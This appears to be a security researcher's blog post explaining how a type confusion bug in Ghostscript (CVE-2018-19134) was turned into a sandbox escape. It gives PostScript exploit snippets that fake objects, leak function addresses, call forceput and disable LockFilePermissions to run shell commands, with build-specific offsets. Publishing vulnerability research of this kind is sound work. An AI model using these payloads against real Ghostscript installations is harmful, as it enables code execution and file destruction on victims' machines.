February 5, 2019

Exploiting CVE-2018-19134: Ghostscript RCE through type confusion

Man Yue Mo

In this post I'll show how to construct an arbitrary code execution exploit for CVE-2018-19134, a vulnerability caused by type confusion. I discovered CVE-2018-19134 (alongside 3 other CVEs in Ghostscript) back in November 2018. If you'd like to know more about how I used our CodeQL technology to perform variant analysis in order to find these vulnerabilities (and how you can do so yourself!), please have a look at my previous blog post.

The vulnerability

Let's first briefly recap the vulnerability. Recall that PostScript objects are represented as the type ref_s (or more commonly ref, which is a typedef of ref_s).

struct ref_s {
    struct tas_s tas;

    union v {
        ps_int intval;
        ...
        uint64_t dummy;
    } value;
};

This is a 16-byte structure in which tas_s occupies the first 8 bytes, containing the type information as well as the size for arrays, strings, dictionaries, etc.:

struct tas_s {
    ushort type_attrs;
    ushort _pad;
    uint32_t rsize;
};

The vulnerability I found is the result of a missing type check in the function zsetcolor: the type of pPatInst was not checked before interpreting it as a gs_pattern_instance_t.

static int
zsetcolor(i_ctx_t * i_ctx_p)
{
    ...
    if ((n_comps = cs_num_components(pcs)) < 0) {
        n_comps = -n_comps;
        if (r_has_type(op, t_dictionary)) {
            ref     *pImpl, pPatInst;

            if ((code = dict_find_string(op, "Implementation", &pImpl)) < 0)
                return code;
            if (code > 0) {
                code = array_get(imemory, pImpl, 0, &pPatInst); //<--- Reported by Tavis Ormandy
                if (code < 0)
                    return code;
                cc.pattern = r_ptr(&pPatInst, gs_pattern_instance_t); //<--- What's the type of &pPatInst?!
                n_numeric_comps = ( pattern_instance_uses_base_space(cc.pattern) ? n_comps - 1 : 0);

Here, r_ptr is a macro in iref.h:

#define r_ptr(rp,typ) ((typ *)((rp)->value.pstruct))

The value of pstruct originates from PostScript, and is therefore controlled by the user. For example, the following input to setpattern (which calls zsetcolor under the hood) will result in pPatInst.value.pstruct evaluating to 0x41.

<< /Implementation [16#41] >> setpattern

Following the code into pattern_instance_uses_base_space, I see that the object that I control is now the pointer pinst, which the code interprets as a gs_pattern_instance_t pointer:

pattern_instance_uses_base_space(const gs_pattern_instance_t * pinst)
{
  return pinst->type->procs.uses_base_space(
           pinst->type->procs.get_pattern(pinst) );
}

So it looks like I may be able to control two function pointers, get_pattern and uses_base_space, as well as the argument pinst that is passed to them.

Creating a fake object

Let's see exactly how much of pinst is under my control. The PostScript type array is particularly useful here, as its value stores a ref pointer that points to the start of a ref array. This allows me to create a buffer pointed to by value, whose contents I can control:

[Figure: postscript_array]

In the above, a grey box indicates data that I have partial control of (I cannot control type_attrs and _pad in tas completely); green indicates the data that I have complete control of. The crucial point here is that both value in a ref and type in a gs_pattern_instance_t have an offset of 8 bytes. This means that procs in pinst->type->procs will be the underlying PostScript array that is partially under my control. It turns out that I can indeed control both the function pointers get_pattern and uses_base_space by using nested arrays:

GS><</Implementation [[16#41 [16#51 16#52]]] >> setpattern

This sets pinst to the array [16#41 [16#51 16#52]] and results in:

[Figure: pinst]

This shows I indeed have full control over both uses_base_space and get_pattern. The next step: how do I use an arbitrary function pointer to achieve code execution?

8 bytes off an easy exploit

I decided to start with getting any valid function pointer. In Ghostscript, built-in PostScript operators are represented by the type t_operator. As a ref, its value is an op_proc_t, which is a function pointer. These can be reached by getting the operators off the systemdict by their name:

GS>systemdict /put get ==
GS>--put--

So let's try to put some built-in functions in our fake array:

/arr 100 array def
systemdict /put get arr exch 1 exch put
systemdict /get get arr exch 0 exch put
<</Implementation [[16#41 arr]] >> setpattern

I'll be using the following PostScript instructions rather a lot: systemdict <foo> get <arr> exch <idx> exch put. This fetches foo from systemdict and stores it in array arr at index idx. There may exist a better way of achieving that, but keep in mind that I had never written a line of PostScript before I found these vulnerabilities, so please bear with me.

Indeed, I can now call the zget and zput C functions directly, instead of uses_base_space and get_pattern:

[Figure: zgetput]

So I can now call functions that I could already call from PostScript anyway, so what did I gain? The point here is that I also control the arguments to these functions, in C. When the underlying C function is called from PostScript, an execution context is passed to the C function as its argument. This context, represented by the type i_ctx_t (alias of gs_context_state_s — they do like their typedefs!), contains a lot of information that cannot be controlled from PostScript, among which are important security settings such as LockFilePermissions:

struct gs_context_state_s {
    ...
    bool LockFilePermissions;	/* accessed from userparams */
    ...
    /* Put the stacks at the end to minimize other offsets. */
    dict_stack_t dict_stack;
    exec_stack_t exec_stack;
    op_stack_t op_stack;
    struct i_plugin_holder_s *plugin_list;
};

When calling operators from PostScript, the arguments passed to the operator are stored in op_stack. By calling these functions from C directly and having control of the argument i_ctx_p, we'll be able to call functions as if Ghostscript were running without -dSAFER switched on.

So let's try to create a PostScript array to fake the context i_ctx_t object. PostScript function arguments are stored in i_ctx_p->op_stack.stack.p, which is a ref pointer that points to the argument. In order to call PostScript functions with a fake context, I'll need to control p. The offset of p from i_ctx_p is the same as the offset of op_stack, which is 0x270. As each ref is of size 0x10, this corresponds to the element at index 39 (0x270 / 0x10 = 0x27) of the fake ref array:

[Figure: op_stack]

As seen from the diagram, this alignment is not ideal. The op_stack.stack.p corresponds to the tas part of my array, which I don't control completely. If only op_stack corresponded to a value field of a ref, then I would have succeeded. What's more, tas stores the metadata of a ref, so even if I had full control of it, I wouldn't be able to set it to the address of an arbitrary object without first knowing its address. As most PostScript functions dereference the operand pointer, any exploit will most likely just crash Ghostscript at this point. This looks like a show-stopper.

Getting arbitrary read and write primitives

The idea now is to find a PostScript function that:

  1. Does not dereference the osp (op_stack.stack.p) pointer;

  2. Still does something "useful" to osp;

  3. Is available in SAFER mode.

Stack operators come to mind. The pop operator is particularly interesting:

zpop(i_ctx_t *i_ctx_p)
{
    os_ptr op = osp;

    check_op(1);
    pop(1);
    return 0;
}

It checks the value of the stack pointer against the bottom of the stack with check_op, which compares osp against the pointer osbot. If osp is greater than osbot, the function then decreases the value of osp. It is a simple function that does not dereference osp, yet it changes its value. To see what I can gain from this, let's take a closer look at the structure of ref and op_stack side by side:

[Figure: op_stack_ref]

Recall that in our fake object, op_stack is faked by the element at index 39 of a ref array, which is itself a ref. As you can see in the image above, the field tas corresponds to p, while value corresponds to osbot. In particular, the three fields type_attrs, _pad and rsize combine to form the pointer p in op_stack. As explained before, type_attrs specifies the type of the ref object, as well as its accessibility. So by using pop, I can modify both the type and accessibility of an object of my choice! One catch though: pop only works if p is larger than osbot, which is the address of this ref object. So in order for this to work, the object that I am tampering with needs to be a string, array or dictionary that is large enough, so that rsize, which gives the top bytes of p, combines with the other fields to give something that is greater than the pointer address of most ref objects. This prevents me from just modifying the accessibility of built-in read-only objects like systemdict to gain write access. Still, there are at least a couple of things that I can do:

  1. I can "convert" an array into a string this way, which will then treat the internal ref array as a byte array (i.e. the ref pointer in the value field of this array is now treated as a byte array of the same length). This allows me to read and write the in-memory representation of any object that I put into the array. This is very powerful, as strings in PostScript are not terminated by a null character, but rather treated as a byte buffer of the length specified by rsize, so any byte in the buffer can be read or written. Note that this does not give me any out-of-bounds (OOB) read/write, as the resulting string will have the same length as the original array, but since each ref is 16 bytes, the resulting byte buffer will only cover about 1/16 of the buffer originally allocated for the ref array. This is what I'm going to do with the exploit.

  2. I can of course do it the other way round and "convert" a string into an array of the same length. As explained above, the resulting ref array will be about 16 times larger than the original string buffer, which allows me to do OOB reads and writes. I have not pursued this route.

There is one more technical difficulty that I need to overcome. The code that uses the fake object pinst actually calls two functions, with the output of one feeding into the other:

  return pinst->type->procs.uses_base_space(
           pinst->type->procs.get_pattern(pinst) );

As seen from above, uses_base_space takes the return value of pinst->type->procs.get_pattern(pinst), which is now zpop(pinst), as its input. As zpop returns 0, this is likely to cause a null pointer dereference when I use any built-in PostScript operator in place of uses_base_space, unless I can find an operator that doesn't use the context pointer i_ctx_p at all.

If only there exists a query language I could use to find particular patterns in a codebase! Here's the query I used to find the operator I was looking for:

from Function f
where
  f.getName().matches("z%") and
  f.getFile().getAbsolutePath().matches("%/psi/%") and
  // Look for functions with a single parameter of the right type:
  f.getNumberOfParameters() = 1 and f.getParameter(0).getType().hasName("i_ctx_t *") and
  // Make sure the function is actually defined:
  exists(Stmt stmt | stmt.getEnclosingFunction() = f) and
  // And doesn't access `i_ctx_p`
  not exists(FieldAccess fa, Function f2 |
    fa.getQualifier().getType().hasName("i_ctx_t *") and
    fa.getEnclosingFunction() = f2 and f.calls*(f2)
   )
  // And doesn't dereference `i_ctx_p`
  and not exists(PointerDereferenceExpr expr, Variable v, Function f2 | 
    expr.getAnOperand() = v.getAnAccess() and
    v.getType().hasName("i_ctx_t *") and 
    expr.getEnclosingFunction() = f2 and
    f.calls*(f2)
  )
select f

My query uses some heuristics to identify PostScript operators. Their names normally start with z and they are defined inside the psi directory. They also take an argument of type i_ctx_t *. I then look for functions that neither dereference the argument nor access its fields, either in the function itself or in functions that it calls. This query does not look specifically for dereferences of the parameter i_ctx_p, but for dereferences of any variable of type i_ctx_t *, which is a good enough approximation.

You can run your own queries on over 130,000 GitHub, Bitbucket, and GitLab projects at LGTM.com. You can use either the online query console, or you can install the CodeQL for Eclipse plugin and run queries locally on a code snapshot (downloadable from the repo's project page on LGTM).

[EDIT]: You can also use our free CodeQL extension for Visual Studio Code. See installation instructions at https://securitylab.github.com/tools/codeql.

Ghostscript is not developed on GitHub, Bitbucket, or GitLab, so it has not been analyzed by LGTM.com. But you can download a Ghostscript code snapshot here.

This query gives me 6 results:

[Figure: ucache]

The function ucache seems to be just what we need. Let's try to put this together and see if it works. First set up the fake object pinst:

%Create the fake array pinst
/pinst 100 array def
%array that stores the pop-ucache gadget
/pop_ucache 100 array def
%put pop into pop_ucache to cause more type confusions by decrementing osp
systemdict /pop get pop_ucache exch 1 exch put
%put ucache in (no op) to avoid crash
systemdict /ucache get pop_ucache exch 0 exch put
%replace the functions with pop and ucache
pinst 1 pop_ucache put

Now we need to create a large array object and store it at index 39 of pinst. Its metadata tas will then be interpreted as the stack pointer address osp. I'll use the PostScript operator put as its first element, then use pop to change its type to string and read off the address of the zput function.

%make a large enough array and change its type with pop
/arr 32767 array def
%get the address of the put operator
systemdict /put get arr exch 0 exch put
%store arr as 39th element of pinst and modify its type
pinst 39 arr put
%Create the argument to setpattern
/impl 100 dict def
impl /Implementation [pinst] put
%Change type of arr to string
0 1 1291 {impl setpattern} for
% Print the address of zput as string
pinst 39 get 8 8 getinterval

It is a bit unfortunate that the type_attrs value for array is 0x4 while the value for string is 0x12, so I have to underflow the ushort to go from array to string, which is why I have to do impl setpattern 1291 times.

[Figure: put_addr]

As can be seen in the screenshot above, the fake array gets converted into a string and I get the address of zput. I actually have to run it outside of gdb, or at least enable address randomization, to get it to work, as gdb seems to always allocate arr at 0x7ffff0a35078, but with memory randomization I've not failed a single time with the above. I can also use this to write bytes to any position in arr.

Sandbox bypass

Now that I can read and write arbitrary bytes from an arbitrary PostScript object, it is just a matter of deciding what is the easiest thing to do. My original plan was to simply overwrite the LockFilePermissions parameter, and then call file, which would allow arbitrary command execution, like I did with CVE-2018-19475. However, it turns out that in order for this to work, I also need to fake a number of other objects in the execution context i_ctx_p, which seems too complicated. Instead, I'm just going to call a simple but powerful function that I am not supposed to have access to in SAFER mode, then use it to overwrite some security settings, which will then allow me to run arbitrary shell commands. The operator forceput (also used by Tavis Ormandy in one of his Ghostscript vulnerabilities) fits the bill nicely.

Summarizing, here is what I need to do now:

  1. Create a fake operand stack with the arguments that I want to supply to forceput;

  2. Overwrite the location in pinst that stores the operand stack pointer with the address of what I created above;

  3. Get the address of forceput and replace pinst->type->procs.get_pattern with its address.

To achieve (1), recall that the operand stack is nothing more than an array of ref. To fake it, I just need to create an array with my arguments:

/operand 3 array def
operand 0 userparams put
operand 1 /LockFilePermissions put
operand 2 false put

I can then store it in arr to retrieve the address of this array. Instead of using arr, I'm just going to reuse pinst and put it at index 31 instead:

pinst 31 operand 2 1 getinterval put

Note that instead of putting operand itself at index 31 of pinst, I create a new array starting from operand[2] and use that new array. This is because PostScript functions look for their arguments by going down the operand stack, so I need to set it up so that when osp decreases, it will reach my other arguments.

Using the trick in the previous section, I can now read off the address of this fake stack pointer and write it to the appropriate location in pinst. This then sets up pinst for calling forceput. Although forceput is not accessible from SAFER mode, I can simply take the address of zput, and add its offset to zforceput to obtain the address of zforceput (as this offset is not randomized). In the debug binary compiled with commit 81f3d1e, this offset is 0x437 and in the release binary compiled with the same commit, or in the release code of 9.25, this offset is 0x4B0. After doing this, I can simply call a restore to write the new LockFilePermissions parameter to the current device, and then run an arbitrary shell command (again, remember to turn address randomization ON). Here's a screenshot of the launching of a calculator from sandboxed Ghostscript:

[Figure: run_command]

By overwriting other entries in userparams, such as PermitFileReading and PermitFileWriting, it is also possible to gain arbitrary file access. Systems like AppArmor may be effective at preventing PDF viewers from starting arbitrary shell commands, but they don't stop a specially-crafted PDF file from wiping a user's entire home directory when opened. Or, if you're in a more forgiving mood, you could delete all files from a user's desktop and subsequently flood it with Super Mario bricks:


https://youtube.com/watch?v=5vVxN-vfCsI

For more videos about our security research and exploits, please visit the Semmle YouTube channel.

If you'd like to run your own queries on open source software: you can! We've made our CodeQL technology freely available for running queries on open source projects that have been analyzed by LGTM.com. At the time of writing, LGTM.com has analyzed around 130,000 GitHub, Bitbucket, and GitLab repositories. For each of these projects, you can download a code snapshot from LGTM.com for running queries. In addition, you'll need the CodeQL for Eclipse plugin. Unfortunately Ghostscript is not developed on GitHub.com and has therefore not been analyzed by LGTM.com. We've therefore made the Ghostscript code snapshot available here.

Note: Post originally published on LGTM.com on February 05, 2019